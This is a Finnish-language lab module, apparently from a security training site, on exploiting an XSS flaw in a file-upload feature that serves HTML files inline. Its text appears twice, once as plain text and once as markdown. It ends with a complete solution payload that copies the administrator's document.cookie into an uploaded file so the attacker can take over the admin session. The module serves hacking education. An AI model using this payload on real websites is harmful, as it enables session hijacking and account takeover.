Tässä moduulissa hyväksikäytämme harjoituskohteessa olevaa XSS-haavoittuvuutta, joten voit käynnistää alla olevan tehtävän ja toistaa vaiheet omassa tahdissa.

Tässä tehtävässä käytämme hyväksi XSS-haavoittuvuutta tiedostolähetystoiminnossa ja varastamme järjestelmänvalvojan istuntoevästeet.

XSS Tiedostolähetyksessä

Tiedostojen lähettäminen on toiminnallisuutena kompleksinen ja voi johtaa moniin haavoittuvuuksiin, jos kaikkea ei oteta huomioon. Mahdollisuus siirtää omia tiedostoja järjestelmään onkin usein yksi mielenkiintoisimmista testattavista asioista verkkosivuja testatessa. Lähestymistapoja tiedostojen lähettämiseen on monia ja moni asia voi johtaa erilaisiin haavoittuvuuksiin, jos kaikkea ei oteta huomioon. Tässä moduulissa tutkimme, minkälaisia XSS-haavoittuvuuksia voi mm. koitua, kun sovellus sallii vaarallisia tiedostotyyppejä, eikä palauta tiedostoa tilanteen vaatimalla tavalla.

Aloitamme tutkimalla siirtämällä sovellukseen yksinkertaisen TXT tiedoston ja katsomme kuinka sovellus käsittelee tiedostoa. Haluamme ymmärtää muunmuassa, kuinka tiedoston siirto suoritetaan ja pääseekö tiedostoon käsiksi sovelluksesta käsin.

Siirsimme sovellukseen test.txt nimisen tiedoston ja sovellus loi sivulle linkin tiedostoon.

Sovellus otti vastaan antamamme TXT tiedoston ja loi sivulle linkin tiedostoon. Linkkiin navigoidessamme, sovellus palauttaa tiedoston selaimeen seuraavalla tavalla.

otsakkeella verkkosivu voi kertoa selaimelle, että kyseinen resurssi täytyy ladata tiedostona alas, eikä näyttää omana sivunaan selaimessa. Koska sovellus ei palauta tätä, selain suorittaa ja näyttää tiedoston yllä olevalla tavalla, omana sivunaan. Tästä voi koitua vakavia haavoittuvuuksia riippuen siitä, mitä tiedostotyyppejä sovellus sallii. Kokeilemme seuraavaksi siirtää sovellukseen HTML-tiedoston ja katsomme onko tämä sallittua. Luomme uuden tiedoston, lisäämme tiedostoon HTML-koodia ja siirrämme tämän sovellukseen.

Sovellus sallii HTML tiedostot ja palauttaa nämä omana sivunaan selaimeen.

Varmistamme vielä, että tiedostomme voi sisältää JavaScript-koodia ja, että sovellus on haavoittuvainen XSS-hyökkäykselle. Lisäämme tiedostoon JavaScript-koodia ja siirrämme tämän sovellukseen.

Lopuksi suoritamme hyökkäyksen käyttämällä samaa ideaa kuin aiemmissa moduuleissa, eli käytämme sovellukseen rakennettua tiedostojen tallennustoimintoa järjestelmänvalvojan istuntoevästeen vuotamiseen. Tämä tapahtuu seuraavissa vaiheissa.

Tallennamme uuden tiedoston ja analysoimme siitä koituneen HTTP-pyynnön

Toistamme pyynnön JavaScript-koodilla, siten että tallennettu tiedosto sisältää istuntoevästeet.

Asetamme haittakoodiamme sellaiseen muotoon, että tämä toimii löydetyssä XSS-haavoittuvuudessa

Lisäämme sivulle uuden tiedoston, joka sisältää haittakoodimme

Odotamme, että järjestelmänvalvoja avaa tiedostomme, joka pakottaa järjestelmänvalvojan selaimen luomaan tallentamaan uuden tiedoston, sisältäen hänen istuntoevästeet

Kirjaudumme sisään järjestelmänvalvojana

Kokeile toistaa listatut vaiheet itse! - Voit ottaa mallia aiemmista moduuleista.

 - Jotta voit ratkaista tehtävän tarvitsee sinun ensin luoda oikean näköinen HTTP-kutsu. Tähän tarvitset 

 objekteja, joita voidaan luoda seuraavalla tavalla.

objekti vaatii muutoksia, eli lisäät luomasi Blob objektin seuraavalla tavalla.

Voit ratkaista tehtävän tallentamalla sovellukseen seuraavan näköisen HTML-tiedoston.

Näin ratkaiset tehtävän; muista yrittää ensin itse!

*Tässä moduulissa hyväksikäytämme harjoituskohteessa olevaa XSS-haavoittuvuutta, joten voit käynnistää alla olevan tehtävän ja toistaa vaiheet omassa tahdissa.*

@exercise 6d17cc07813f

Tiedostojen lähettäminen on toiminnallisuutena kompleksinen ja voi johtaa moniin haavoittuvuuksiin, jos kaikkea ei oteta huomioon. Mahdollisuus siirtää omia tiedostoja järjestelmään onkin usein yksi mielenkiintoisimmista testattavista asioista verkkosivuja testatessa. Lähestymistapoja tiedostojen lähettämiseen on monia ja moni asia voi johtaa erilaisiin haavoittuvuuksiin, jos kaikkea ei oteta huomioon. Tässä moduulissa tutkimme, minkälaisia XSS-haavoittuvuuksia voi mm. koitua, kun sovellus sallii vaarallisia tiedostotyyppejä, eikä palauta tiedostoa tilanteen vaatimalla tavalla.

## Haavoittuvuuden löytäminen

Aloitamme tutkimalla siirtämällä sovellukseen yksinkertaisen TXT tiedoston ja katsomme kuinka sovellus käsittelee tiedostoa. Haluamme ymmärtää muunmuassa, kuinka tiedoston siirto suoritetaan ja pääseekö tiedostoon käsiksi sovelluksesta käsin.

*Siirsimme sovellukseen test.txt nimisen tiedoston ja sovellus loi sivulle linkin tiedostoon.*

![](sanity:image-3068721fe74166798dcb7875b548d5087d365aff-1980x338-png)

Sovellus otti vastaan antamamme TXT tiedoston ja loi sivulle linkin tiedostoon. Linkkiin navigoidessamme, sovellus palauttaa tiedoston selaimeen seuraavalla tavalla.

![](sanity:image-896b88e82d91f3f7c26e0eb5d2a8936683442431-1624x290-png)

**Content-Disposition **otsakkeella verkkosivu voi kertoa selaimelle, että kyseinen resurssi täytyy ladata tiedostona alas, eikä näyttää omana sivunaan selaimessa. Koska sovellus ei palauta tätä, selain suorittaa ja näyttää tiedoston yllä olevalla tavalla, omana sivunaan. Tästä voi koitua vakavia haavoittuvuuksia riippuen siitä, mitä tiedostotyyppejä sovellus sallii. Kokeilemme seuraavaksi siirtää sovellukseen HTML-tiedoston ja katsomme onko tämä sallittua. Luomme uuden tiedoston, lisäämme tiedostoon HTML-koodia ja siirrämme tämän sovellukseen.

```html
<h1>Hei kaikki!</h1>
```

*Sovellus sallii HTML tiedostot ja palauttaa nämä omana sivunaan selaimeen.*

![](sanity:image-dba5c17d678c85537fe9f4aefcd13871afdbeb75-1824x364-png)

Varmistamme vielä, että tiedostomme voi sisältää JavaScript-koodia ja, että sovellus on haavoittuvainen XSS-hyökkäykselle. Lisäämme tiedostoon JavaScript-koodia ja siirrämme tämän sovellukseen.

```html
<h1>Hei kaikki!</h1>
<script>alert('xss')</script>
```

![](sanity:image-9d2b22d9b29456796adbd245d9a37dd54cfb3788-1634x432-png)

---

## Hyödynnä haavoittuvuutta

Lopuksi suoritamme hyökkäyksen käyttämällä samaa ideaa kuin aiemmissa moduuleissa, eli käytämme sovellukseen rakennettua tiedostojen tallennustoimintoa järjestelmänvalvojan istuntoevästeen vuotamiseen. Tämä tapahtuu seuraavissa vaiheissa.

- Tallennamme uuden tiedoston ja analysoimme siitä koituneen HTTP-pyynnön
- Toistamme pyynnön JavaScript-koodilla, siten että tallennettu tiedosto sisältää istuntoevästeet.
- Asetamme haittakoodiamme sellaiseen muotoon, että tämä toimii löydetyssä XSS-haavoittuvuudessa
- Lisäämme sivulle uuden tiedoston, joka sisältää haittakoodimme
- Odotamme, että järjestelmänvalvoja avaa tiedostomme, joka pakottaa järjestelmänvalvojan selaimen luomaan tallentamaan uuden tiedoston, sisältäen hänen istuntoevästeet
- Kirjaudumme sisään järjestelmänvalvojana

Kokeile toistaa listatut vaiheet itse! - Voit ottaa mallia aiemmista moduuleista.

**Huom!** - Jotta voit ratkaista tehtävän tarvitsee sinun ensin luoda oikean näköinen HTTP-kutsu. Tähän tarvitset **Blob** objekteja, joita voidaan luoda seuraavalla tavalla.

```javascript
var blobobjekti = new Blob([document.cookie], {type: 'text/plain'});

```

Myös **FormData **objekti vaatii muutoksia, eli lisäät luomasi Blob objektin seuraavalla tavalla.

```javascript
fdata.append('share-file', blobobjekti, 'tiedostonnimi.txt'); 
```

@embed 5850049737ca


Voit ratkaista tehtävän tallentamalla sovellukseen seuraavan näköisen HTML-tiedoston.

```html
<script>

  var blob = new Blob([document.cookie], {type: 'text/plain'});
  var fdata=new FormData();
  fdata.append('share-file', blob, 'tunnisti.txt'); 
  fetch('/',{ method: 'POST', body: fdata });

</script>

```

XSS tiedostolatauksissa - HTML

Opi löytämään ja hyväksikäyttämään haavoittuvuutta joka on yksi kaikista yleisimmistä haavoittuvuuksista, helpohko löytää, ja siitä huolimatta hyvin vaarallinen. Hackerone rankkasi XSS:n #1 bug bounty -haavoittuvuudeksi 2021.

XSS (Cross-Site Scripting) haavoittuvuudet ovat sekä yleisiä että vakavia. Esimerkiksi HackerOne on listannut XSS:n ensimmäiseksi top 10 haavoittuvuudet listallaan.

Haavoittuvuuden läpikohtainen hallitseminen on siis erittäin tärkeää, olit sitten murtotestaaja, tietoturvakonsultti, kehittäjä tai bounty hunteri!

XSS tiedostolatauksissa - HTML

Haavoittuvuuden löytäminen

Hakkeroinnin oppiminen alkaa tästä